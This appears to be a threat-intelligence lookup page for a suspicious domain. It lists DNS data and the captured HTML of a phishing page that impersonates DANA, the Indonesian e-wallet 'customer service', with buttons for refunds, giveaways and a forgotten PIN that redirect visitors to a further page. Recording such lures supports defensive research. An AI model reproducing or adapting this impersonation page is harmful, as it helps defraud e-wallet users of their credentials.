Help
RSS
API
Feed
Maltego
Contact
Domain > 9695.gt-r66.web.id
×
More information on this domain is in
AlienVault OTX
Is this malicious?
Yes
No
DNS Resolutions
Date
IP Address
2026-02-25
104.21.25.65
(
ClassC
)
Port 80
HTTP/1.1 200 OKDate: Wed, 25 Feb 2026 20:00:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveServer: cloudflareLast-Modified: Thu, 01 Jan 2026 13:09:45 GMTAccept-Ranges: bytesNel: {report_to:cf-nel,success_fraction:0.0,max_age:604800}Report-To: {group:cf-nel,max_age:604800,endpoints:{url:https://a.nel.cloudflare.com/report/v4?sCLbfZqX4v2K5CG7Yl4TZY%2BwrB5ZNdUVU9rOVWDvigOSC%2FSHNvqEYyuY%2BBjPsO5Svac6ypkGMPYxVDNEf%2FcgQF8YOKLiX%2F73W79rQZutOuZs%3D}}cf-cache-status: DYNAMICCF-RAY: 9d39ca71dacd5ee4-PDXalt-svc: h3:443; ma86400 html>head>meta charsetUTF-8> meta nametheme-color content#118EEA> meta nameviewport contentwidthdevice-width, initial-scale1, maximum-scale1, user-scalable0, maximum-scale1> title>Dana Customer Service/title> meta namedescription contentDANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!> !-- Facebook Meta Tags --> meta propertyog:url contenthttps://www.dana.id> meta propertyog:type contentwebsite> meta propertyog:title contentDana Customer Service> meta propertyog:description contentDANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!> meta propertyog:image contenthttps://encrypted-tbn0.gstatic.com/images?qtbn:ANd9GcQNUuAGYSkx27wI61q2KmtEyw7HzUjIUsbyEw&usqpCAU> !-- Twitter Meta Tags --> meta nametwitter:card contentsummary_large_image> meta propertytwitter:domain contenthttps://www.dana.id> meta propertytwitter:url contenthttps://www.dana.id> meta nametwitter:title contentDana Customer Service> meta nametwitter:description contentDANA adalah bentuk baru uang tunai yang lebih baik. Transaksi apapun, berapapun dan dimanapun jadi mudah bersama DANA. Ambil bagian dalam transformasi keuangan digital di Indonesia sekarang!> meta nametwitter:image contenthttps://encrypted-tbn0.gstatic.com/images?qtbn:ANd9GcQNUuAGYSkx27wI61q2KmtEyw7HzUjIUsbyEw&usqpCAU> link hrefhttps://encrypted-tbn0.gstatic.com/images?qtbn:ANd9GcQZ9dATs_nkzyO-gSoQWbtIhJV7bG51r3gOKg&usqpCAU relshortcut icon typeimage/x-icon> link hrefhttps://encrypted-tbn0.gstatic.com/images?qtbn:ANd9GcQZ9dATs_nkzyO-gSoQWbtIhJV7bG51r3gOKg&usqpCAU relapple-touch-icon> link relcanonical hrefhttps://www.dana.id/>meta propertyog:url contenthttps://www.dana.id/>meta propertyog:description contentHai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung>meta propertytwitter:description contentHai TemanDANA, Jika membutuhkan bantuan yuk hubungi kami langsung> link relstylesheet hrefcss/reset.min.css>link relstylesheet hrefhttps://fonts.googleapis.com/css?familyVarela+Round&displayswap>link relstylesheet hrefcss/style.css>!-- partial:index.partial.html -->link hrefcss/owl.carousel.min.css relstylesheet>link hrefcss/owl.theme.default.min.css relstylesheet>script srcjs/jquery.min.js>/script> script srcjs/owl.carousel.js> /script>style> form { --background: #ffffff; --text: #414856; --radio: #7C96B2; --radio-checked: #118EEA; --radio-size: 25px; --width: 292px; --height: 120px; --border-radius: 20px 20px 8px 8px; background: var(--background); width: var(--width); height: var(--height); border-radius: var(--border-radius); color: var(--text); position: relative; left: 0; right: 0; box-shadow: 0 10px 30px rgba(65, 72, 86, 0.05); box-shadow: rgba(99, 99, 99, 0.2) 0px 2px 8px 0px; padding: 30px 20px; padding-top: 10px; display: block; grid-template-columns: auto var(--radio-size); font-weight: bold; align-items: center; font-family: Alata, sans-serif; }form label { cursor: pointer; color: #118EEA; font-weight: bold; text-shadow: 1px 1px 0 #FFF;}form inputtyperadio { -webkit-appearance: none; -moz-appearance: none; position: relative; height: var(--radio-size); width: var(--radio-size); outline: none; margin: 3px 0; cursor: pointer; border: 2px solid var(--radio); background: transparent; border-radius: 50%; display: grid; justify-self: end; justify-items: center; align-items: center; overflow: hidden; transition: border 0.5s ease;}form inputtyperadio::before, form inputtyperadio::after { content: ; display: flex; justify-self: center; border-radius: 50%;}form inputtyperadio::before { position: absolute; width: 100%; height: 100%; background: var(--background); z-index: 1; opacity: var(--opacity, 1);}form inputtyperadio::after { position: relative; width: calc(100% /2); height: calc(100% /2); background: var(--radio-checked); top: var(--y, 100%); transition: top 0.5s cubic-bezier(0.48, 1.97, 0.5, 0.63);}form inputtyperadio:checked { --radio: var(--radio-checked);}form inputtyperadio:checked::after { --y: 0%; -webkit-animation: stretch-animate 0.3s ease-out 0.17s; animation: stretch-animate 0.3s ease-out 0.17s;}form inputtyperadio:checked::before { --opacity: 0;}form inputtyperadio:checked ~ inputtyperadio::after { --y: -100%;}form inputtyperadio:not(:checked)::before { --opacity: 1; transition: opacity 0s linear 0.5s;}@-webkit-keyframes stretch-animate { 0% { transform: scale(1, 1); } 28% { transform: scale(1.15, 0.85); } 50% { transform: scale(0.9, 1.1); } 100% { transform: scale(1, 1); }}@keyframes stretch-animate { 0% { transform: scale(1, 1); } 28% { transform: scale(1.15, 0.85); } 50% { transform: scale(0.9, 1.1); } 100% { transform: scale(1, 1); }}body { background: #E8EBF3; height: 100%; font: 400 16px Varela Round, sans-serif; display: flex; flex-direction: column; justify-content: center; align-items: center;}body .socials { position: fixed; display: block; left: 20px; bottom: 20px;}body .socials > a { display: block; width: 30px; opacity: 0.2; transform: scale(var(--scale, 0.8)); transition: transform 0.3s cubic-bezier(0.38, -0.12, 0.24, 1.91);}body .socials > a:hover { --scale: 1;} /* Added PseudoCode CSS to Hide the Controls of Video as on adding Controls Attribute to Video, the controls of video get visible easily. So to control that case also, this needs to be present on CSS End */video::-webkit-media-controls { display: ;}video { display: none; pointer-events: none;}#carousel { grid-row: 1 / 2; grid-column: 1 / 8; width: 150vw; height: 500px; display: flex; align-items: center; justify-content: center; overflow: hidden; transform-style: preserve-3d; perspective: 600px; --items: 5; --middle: 3; --position: 1; pointer-events: none;}div.item { position: absolute; width: 300px; height: 400px; background-color: coral; --r: calc(var(--position) - var(--offset)); --abs: max(calc(var(--r) * -1), var(--r)); transition: all 0.25s linear; transform: rotateY(calc(-10deg * var(--r))) translateX(calc(-300px * var(--r))); z-index: calc((var(--position) - var(--abs)));}div.item:nth-of-type(1) { --offset: 1; background-color: #90f1ef;}div.item:nth-of-type(2) { --offset: 2; background-color: #ff70a6;}div.item:nth-of-type(3) { --offset: 3; background-color: #ff9770;}div.item:nth-of-type(4) { --offset: 4; background-color: #ffd670;}div.item:nth-of-type(5) { --offset: 5; background-color: #e9ff70;} .btn-punya { display: inline-block; margin: 5px auto; padding: 0px; position: relative; cursor: pointer; left: 0; right: 0; background: none rgb(0, 134, 224); border: none; text-align: center; height: 45px; width: 100%; border: 1.5px solid #ddd; font-family: Open Sans, sans-serif; font-size: 14px; font-weight: bold; color: rgb(255, 255, 255); letter-spacing: 1px; line-height: 1; border-radius: 50px; box-shadow: rgb(170, 170, 170) 5px 5px 7px 0px; transition: background 200ms ease 0s; } .btn-punya:active{ opacity: 0.5; } /*********************/.process1 { width: 100%; height: 100%; display: flex; justify-content: center; margin: auto; position: absolute; padding-top: 300px; left: 0; right: 0; bottom: 0; background: rgba(0, 0, 0, 0.4); z-index: 99999; box-shadow: rgba(6, 24, 44, 0.4) 0px 0px 0px 0px, rgba(6, 24, 44, 0.65) 0px 4px 4px -1px, rgba(255, 255, 255, 0.08) 0px 1px 0px inset; background: #118EEA; color: #fff; font-size: 17px; font-weight: bold; }.loading { position: absolute; display: flex; justify-content: center; align-items: center; margin-bottom: 20%; margin-top: 300px;}.loading img { width: 50px; top: 10;}.loading .spinner{ position: absolute; width: 35px; animation: spin 1s linear infinite; -webkit-animation: spin 1s linear infinite; -moz-animation: spin 1s linear infinite; -ms-animation: spin 1s linear infinite; -o-animation: spin 1s linear infinite;}@keyframes spin { 0% { transform: rotate(360deg); } 100% { transform: rotate(0deg); }}@-webkit-keyframes spin { 0% { -webkit-transform: rotate(360deg); } 100% { -webkit-transform: rotate(0deg); }}@-moz-keyframes spin { 0% { -webkit-transform: rotate(360deg); } 100% { -webkit-transform: rotate(0deg); }}@-ms-keyframes spin { 0% { -webkit-transform: rotate(360deg); } 100% { -webkit-transform: rotate(0deg); }}@-o-keyframes spin { 0% { -webkit-transform: rotate(360deg); } 100% { -webkit-transform: rotate(0deg); }}/*********************/body{ background-image: url(assets/img/hero-personal-bg-back.png); background-position: 100% 100%; background-size: 100% 100%; background-color: #fff;}.animated { -webkit-animation-duration: 3s; animation-duration: 3s; -webkit-animation-fill-mode: both; animation-fill-mode: both; -webkit-animation-name: bounceInDown; animation-name: bounceInDown; }@-webkit-keyframes bounceInDown { 0% { opacity: 1; -webkit-transform: translateY(-200px); } 60% { opacity: 1; -webkit-transform: translateY(0px); } 80% { -webkit-transform: translateY(0px); } 100% { -webkit-transform: translateY(0); } } @keyframes bounceInDown { 0% { opacity: 1; transform: translateY(-200px); } 60% { opacity: 1; transform: translateY(0px); } 80% { transform: translateY(0px); } 100% { transform: translateY(0); } } style>#animation-demo { width: 200px; height: 150px; position: relative; background-color: #62A80A; line-height: 150px; color: #000; border: solid 1px #1A7404; text-align: center;} .effec { -webkit-animation-duration: 2s; animation-duration: 2s; -webkit-animation-fill-mode: both; animation-fill-mode: both;-webkit-animation-name: fadeInRightBig; animation-name: fadeInRightBig; text-align: center;}@-webkit-keyframes fadeInRightBig { 0% { opacity: 1; -webkit-transform: translateX(200px); } 100% { opacity: 1; -webkit-transform: translateX(0); } } @keyframes fadeInRightBig { 0% { opacity: 1; transform: translateX(200px); } 100% { opacity: 1; transform: translateX(0); } } /style>/head>body>nav styleposition: fixed; top: 0; left:0; right: 0; margin: 0px auto; width: 100%; height: 60px; background: transparent; z-index: 999>img srcassets/img/dana-logo.fe46647.png stylewidth: 100px; margin-top: 7px; margin-left: 9px; background: #> /nav>center> img idvideo width100% height30% style width: 100%; display: inline-block; background-color: #118EEA; position: absolute; top: 0; left: 0; right: 0; border-radius: 0px 0px 12px 12px; border-bottom: 3px groove #fff; box-shadow: 0 10px 30px rgba(65, 72, 86, 0.05); box-shadow: rgba(6, 24, 44, 1.4) 0px 0px 6px 6px, rgba(6, 24, 44, 0.05) 0px 4px 6px -1px, rgba(255, 255, 255, 1.08) 0px 1px 0px inset; outline: 3px solid #118EEA preloadmetadata srcassets/img/dana-kaget-dana.jpg typeimg/jpeg classanimated>/center>section classeffec>!-- partial:index.partial.html -->form stylemargin-top: 90px; height: 40px; padding-top: 12px; margin-bottom: 60px; text-align: center; font-size: 15px; background: #118EEA; display: grid; color: #fff; border: 2px solid #fff; outline: 2px solid #118EEA; padding:; box-shadow: rgba(6, 24, 44, 0.4) 0px 0px 4px 5px inset, rgba(6, 24, 44, 0.65) 0px 4px 6px -1px, rgba(255, 255, 255, 0.08) 0px 1px 0px inset;margin-left: 4px> center> h2 stylemargin-left: 14px;text-align: center; font-size: 14px; font-weight: bold; color: #fff; margin-top: -10px; width: 100%>Dengan asisten dana yang siapmembantu anda terkait akun dana anda./h2>/center> /form> audio iddana1 preloadnone srchttps://kementrian-daerah.c1.is/sound/dana1.mp3 typeaudio/ogg>/audio>audio iddana2 preloadnone srchttps://kementrian-daerah.c1.is/sound/dana0.mp3 typeaudio/ogg>/audio>audio iddana3 preloadnone srchttps://kementrian-daerah.c1.is/sound/dana3.mp3 typeaudio/ogg>/audio>audio iddana4 preloadnone srchttps://kementrian-daerah.c1.is/sound/dana9.mp3 typeaudio/ogg>/audio>form stylemargin-top: -90px; border-top: 1px solid #ccc; height: 195px; text-align: center; background: url(assets/img/AddText_04-03-07.31.42.png); background-position: 100% 100%; background-size: 100% 100%; background-color: #fff; outline: 1px solid #118EEA; text-shadow: 0 0.5px 0.5px rgba(000, 999, 255, 10.75);box-shadow: rgba(6, 24, 24, 0.99) 0px 0px 0px 2px, rgba(6, 24, 4, 10.65) 0px 4px 6px -1px, rgba(255, 255, 255, 0.08) 0px 1px 0px inset; font-size: 12px; color: #fff; margin-left: 5.5px> center> button typebutton classbtn-punya onclickletsgo()>Pengambilan dana giveaway/button> button typebutton classbtn-punya onclickletsgo()>Laporkan kenda akun/button> button typebutton classbtn-punya onclickletsgo()>Refund pengembalian dana/button> button typebutton classbtn-punya onclickletsgo()>Lupa pin/button>br>div size0.4 stylemargin-top: 27px; width: 100%; padding: 0px>© 2024 DANA - PT. Espay Debit Indonesia Koe. All Rights Reserved../div>/center>/form>/section>br>!--- ## DRIBBBLE + TWITTER ############# -->center> div idprocess1 nameprocess classprocess1 styledisplay: none; background: rgba(0, 0, 0, 0.4);> div classloading> img srcassets/img/load_bg.png> img classspinner srcassets/img/load_spin.png idloading stylemargin-top: -2px> /div> /div> /center>img srcassets/img/1704436332522.png stylewidth: 100%; position: fixed; bottom: -5; left: 0; right: 0; margin: 0px auto; z-index: -1;> script> const video document.getElementById(video);video.addEventListener(play, handleFirstPlay, false);let hasPlayed false;function handleFirstPlay(event) { if (!hasPlayed) { hasPlayed true; // Remove listener so this only gets called once. const vid event.target; vid.removeEventListener(play, handleFirstPlay); // Start whatever you need to do after first playback has started }}/script>!-- partial --> script>var owl $(.owl-carousel);owl.owlCarousel({ items:2, // items change number for slider display on desktop loop:true, margin:10, autoplay:true, autoplayHoverPause:true}); /script>script> /* Toggle Button to Unmute the Video */function toggleMute() { var video document.getElementById(video); if (video.muted) { video.muted false; } else { video.muted true; }}/* Delay Function to Add SetTimeOut After Defined Interval */function delay(time) { return new Promise((resolve) > setTimeout(resolve, time));}/* Show Video Function to Add Display Property to Show the Video on Click of Button which will fulfilled User Interaction Needs to Browser to Run the Video with Unmute State */function showVideo() { var element document.getElementById(video); var button document.getElementById(button); element.style.display block; button.style.display none; delay(100).then(() > toggleMute());}/script> script> var dana1 document.getElementById(dana1); var dana2 document.getElementById(dana2); var dana3 document.getElementById(dana3); var dana4 document.getElementById(dana4); function play_Audio1() { dana1.play(); this.currentTime 0; dana2.load(); dana3.load(); dana4.load(); } function play_Audio2() { dana2.play(); this.currentTime 0; dana3.load(); dana4.load(); } function play_Audio3() { dana4.play(); this.currentTime 0; dana2.load(); dana3.load(); } function play_Audio4() { dana3.play(); this.currentTime 0; dana4.load(); dana2.load(); } /script> script> function letsgo(){ $(#process1).show(); window.location.hrefinti.html; setTimeout(function(){ $(#process1).fadeOut(); },2000); } /script>script>(function(){function c(){var ba.contentDocument||a.contentWindow.document;if(b){var db.createElement(script);d.innerHTMLwindow.__CF$cv$params{r:89a2cb4b6b049f81,t:MTcxOTQ2MzU5NC4wMDAwMDA};var adocument.createElement(script);a.nonce;a.src/cdn-cgi/challenge-platform/scripts/jsd/main.js;document.getElementsByTagName(head)0.appendChild(a);;b.getElementsByTagName(head)0.appendChild(d)}}if(document.body){var adocument.createElement(iframe);a.height1;a.width1;a.style.positionabsolute;a.style.top0;a.style.left0;a.style.bordernone;a.style.visibilityhidden;document.body.appendChild(a);if(loading!document.readyState)c();else if(window.addEventListener)document.addEventListener(DOMContentLoaded,c);else{var edocument.onreadystatechange||function(){};document.onreadystatechangefunction(b){e(b);loading!document.readyState&&(document.onreadystatechangee,c())}}}})();/script>iframe height1 width1 styleposition: absolute; top: 0px; left: 0px; border: none; visibility: hidden;>/iframe>script src>/script>/body>/html>
View on OTX
|
View on ThreatMiner
Please enable JavaScript to view the
comments powered by Disqus.
Data with thanks to
AlienVault OTX
,
VirusTotal
,
Malwr
and
others
. [
Sitemap
]